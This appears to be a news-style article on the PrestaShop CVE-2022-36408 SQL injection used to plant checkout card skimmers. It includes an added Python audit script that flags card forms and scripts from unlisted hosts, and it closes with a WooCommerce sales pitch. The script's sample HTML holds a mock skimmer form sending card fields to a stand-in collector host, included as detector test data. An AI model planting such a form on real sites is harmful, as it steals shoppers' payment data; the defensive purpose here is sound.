
PrestaShop Zero-Day vulnerability exfiltrates Customer Payment Data from online stores

Malicious actors are exploiting a previously unknown security flaw in the open-source PrestaShop e-commerce platform to inject malicious skimmer code designed to steal sensitive information. The last time this happened was in early March 2022.

"Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites," the company noted in an advisory published on July 22.

PrestaShop is marketed as the leading open-source e-commerce solution in Europe and Latin America, used by almost 300,000 online merchants worldwide.


The goal of the infections is to introduce malicious code capable of stealing payment information entered by customers on checkout pages. Shops using outdated versions of the software or other vulnerable third-party components appear to be the prime targets.

The PrestaShop maintainers also said they found a zero-day flaw in their service, which has been addressed in version 1.7.8.7, although they warned that "we cannot be sure that it's the only way for them to perform the attack".


"This security fix strengthens the MySQL Smarty cache storage against code injection attacks," PrestaShop noted. "This legacy feature is maintained for backward compatibility reasons and will be removed from future PrestaShop versions."

The issue in question is an SQL injection vulnerability affecting versions 1.6.0.10 or greater, and is being tracked as CVE-2022-36408.

Successful exploitation of the flaw could enable an attacker to submit a specially crafted request that grants the ability to execute arbitrary instructions, in this case to inject a fake payment form on the checkout page that gathers credit card information, customer personal data, order data and similar sensitive information.
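One way to check a rendered checkout page for the outcome described above, as an added example that is not from PrestaShop or from the original article: it flags card-entry forms and scripts whose host is not on an allowlist. The hostnames, the field-name hints and the sample HTML are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

CARD_HINTS = ("card", "cc-", "cc_", "ccnum", "cvv", "cvc")  # assumed heuristic, tune per theme

class CheckoutAudit(HTMLParser):
    """Collects forms holding card-like inputs and every script source URL."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.forms, self.scripts = page_url, [], []
        self._form = None  # form currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            action = urljoin(self.page_url, a.get("action") or "")  # empty action posts to the page
            self._form = {"action": action, "card_fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            ident = " ".join(a.get(k) or "" for k in ("name", "id", "autocomplete"))
            if any(h in ident.lower() for h in CARD_HINTS):
                self._form["card_fields"].append(a.get("name") or a.get("id"))
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.page_url, a["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_checkout(html, page_url, allowed_hosts):
    """Return (finding, host) pairs for card forms and scripts off the allowlist."""
    parser = CheckoutAudit(page_url)
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlsplit(form["action"]).hostname
        if form["card_fields"] and host not in allowed_hosts:
            findings.append(("card-form-to-unlisted-host", host))
    for src in parser.scripts:
        host = urlsplit(src).hostname
        if host not in allowed_hosts:
            findings.append(("script-from-unlisted-host", host))
    return findings

SAMPLE_HTML = """
<script src="/assets/theme.js"></script><script src="https://stats-collector.example/p.js"></script>
<form action="https://pay.psp.example/charge"><input name="card_number"></form>
<form action="https://stats-collector.example/gate"><input name="cc_number"><input name="cvv"></form>
"""  # constructed sample: one legitimate PSP form plus an injected look-alike form
```

Because the attack described here runs code on the shop's own server, a skimmer can also be served from an allowlisted host, so treat a clean result as one signal alongside file-integrity checks.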


Not sure that our managed Woo Services is worthy of long-term consideration?

Contact us about WHY CHOOSE WOOCOMMERCE INSTEAD OF PRESTASHOP! Decide after you compare REVENUE LOSS + IMPACT versus ROI.